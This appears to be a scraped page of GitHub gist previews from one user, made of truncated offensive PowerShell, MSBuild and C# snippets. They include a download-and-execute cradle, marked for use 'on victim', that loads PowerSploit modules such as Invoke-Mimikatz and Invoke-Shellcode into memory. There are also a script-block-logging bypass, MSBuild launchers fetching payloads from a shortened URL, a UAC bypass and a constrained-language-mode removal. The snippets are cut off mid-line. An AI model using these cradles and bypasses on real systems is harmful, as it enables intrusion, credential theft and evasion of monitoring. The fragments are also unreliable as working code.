I hereby claim:
- I am davehardy20 on github.
- I am davehardy20 (https://keybase.io/davehardy20) on keybase.
- I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo
To claim this, I am signing this object:
| Remove-Module PowerView -ErrorAction SilentlyContinue | |
| Remove-Module PowerUp -ErrorAction SilentlyContinue | |
| $webclient = New-Object System.Net.WebClient | |
| $url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip" | |
| $file = "$($env:TEMP)\PowerTools.zip" | |
| $webclient.DownloadFile($url,$file) | |
| #Unblock-File -Path $file | |
| $targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules" | |
| New-Item -ItemType Directory -Force -Path $targetondisk | out-null | |
| $shell_app=new-object -com shell.application |
| Remove-Module PowerSploit -ErrorAction SilentlyContinue | |
| $webclient = New-Object System.Net.WebClient | |
| $url = "https://github.com/mattifestation/PowerSploit/archive/master.zip" | |
| $file = "$($env:TEMP)\PowerSploit.zip" | |
| $webclient.DownloadFile($url,$file) | |
| #Unblock-File -Path $file | |
| $targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules" | |
| New-Item -ItemType Directory -Force -Path $targetondisk | out-null | |
| $shell_app=new-object -com shell.application | |
| $zip_file = $shell_app.namespace($file) |
| #Most Useful PowerSploit and PowerTools Modules that can be loaded into memory | |
| # Use this line in PowerShell on victim to pull into memory the modules | |
| #(New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/davehardy20/a81fb1eaabf2512fce88/raw/0d92460eb8d43183d2ce42e3e7cfa367740426b6/in-memory-downloader.ps1")|iex | |
| $downloadcradle = New-Object Net.WebClient | |
| $modules = @( | |
| "https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/VolumeShadowCopyTools. |
I hereby claim:
To claim this, I am signing this object:
| <?xml version="1.0"?> | |
| <command> | |
| <![CDATA[ | |
| function Invoke-WMIObfuscatedPSCommand | |
| function invoke-bypass | |
| { | |
| $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) | |
| $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml --> | |
| <!-- Populate the Env Var like this or many other ways: --> | |
| <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') --> | |
| <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered --> | |
| <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> |
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
| <# | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause | |
| #> | |
| function Invoke-VirtualAlloc { | |
| Param ( | |
| [IntPtr] $lpAddress, | |
| [UInt32] $dwSize, | |
| [UInt32] $flAllocationType, |
| function Remove-ConstrainedLanguageMode { | |
| <# | |
| .Synopsis | |
| Set language mode for a powershell session to 'full'. | |
| .Description | |
| Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' | |
| and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values. | |
| .Example |